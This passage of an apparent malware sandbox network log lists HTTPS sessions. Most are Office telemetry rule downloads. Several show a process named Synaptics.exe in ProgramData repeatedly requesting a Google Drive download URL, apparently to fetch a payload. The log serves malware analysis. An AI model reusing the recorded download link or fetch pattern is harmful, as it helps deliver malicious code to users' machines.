                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TMUZdAanDokDjil0oUsAmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6yM_zTEqldBD0XIA95jjEoq4Cz36jt7biocueOStF7oh6pSVQHJgM-ePwDkXN2Ac-uHbnA9hzEoA
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:33 UTC | 137 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:33 UTC | 1390 | IN | Data Ascii: or 404 (Not Found)!!1</title><style nonce="KmuNTbx5iKT1NoAmyFlDZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:33 UTC | 125 | IN | Data Ascii: .</b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        47 | 192.168.2.5 | 49802 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:32 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GR0SWAN3G9q-1wx3ZZr4SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        48 | 192.168.2.5 | 49806 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:32 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 499
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                        x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bdjrnwqhC1EWRpg2800000003dg000000005xku
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC | 499 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        49 | 192.168.2.5 | 49808 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:32 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                        x-ms-request-id: daea1f5e-401e-005b-68d1-459c0c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bdw2rg8hC1EWR11u400000003ng000000003ac1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        50 | 192.168.2.5 | 49807 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:32 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                        x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bd7wvgbhC1EWR0rgs00000003dg000000003zpr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        51 | 192.168.2.5 | 49809 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:32 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                        x-ms-request-id: 490c4061-c01e-000b-75c3-45e255000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215032Z-1746fd949bd77mkmhC1EWR5efc00000003f000000000v6g3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:32 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        52 | 192.168.2.5 | 49814 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:33 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:33 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:33 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8972972"
                                                                                        x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215033Z-1746fd949bd4w8sthC1EWR700400000003300000000085kk
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:33 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        53 | 192.168.2.5 | 49818 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:34 UTC | 192 | OUT | GET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:34 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                        x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bd6zq92hC1EWRry48000000038000000000fezf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:34 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        54 | 192.168.2.5 | 49819 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:34 UTC | 192 | OUT | GET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                        x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bd7wvgbhC1EWR0rgs000000037g00000000z0t4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC | 486 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        55 | 192.168.2.5 | 49817 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:34 UTC | 192 | OUT | GET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 420
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                        x-ms-request-id: de9014ac-301e-0051-7cc5-4538bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bdxk6n6hC1EWRdr8c000000031000000000yggp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC | 420 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        56 | 192.168.2.5 | 49816 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:34 UTC | 192 | OUT | GET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                        x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bdxk6n6hC1EWRdr8c000000035g00000000ah1k
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC | 472 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        57 | 192.168.2.5 | 49825 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:35 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PFXSNKx7txrgAqxVvRYN8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        58 | 192.168.2.5 | 49824 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:35 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Czf0owbcEny0BwVskT2kbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        59 | 192.168.2.5 | 49826 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:35 UTC | 192 | OUT | GET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 423
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                        x-ms-request-id: 8da67b63-c01e-0034-2ecb-452af6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215035Z-1746fd949bd4w8sthC1EWR7004000000032000000000brpc
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC | 423 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        60 | 192.168.2.5 | 49830 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:36 UTC | 192 | OUT | GET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:36 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:36 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 478
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                        ETag: "0x8DC582B9B233827"
                                                                                        x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215036Z-1746fd949bddtfvqhC1EWRxbpg000000038g000000009wxb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:36 UTC | 478 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        61 | 192.168.2.5 | 49833 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:36 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:37 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:36 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 400
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                        x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215036Z-1746fd949bd9x4mhhC1EWRb76n00000003bg00000000b6qu
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:37 UTC | 400 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        62 | 192.168.2.5 | 49831 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:36 UTC | 192 | OUT | GET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:37 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:36 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                        x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000
                                                                                        x-ms-version: 2018-03-28
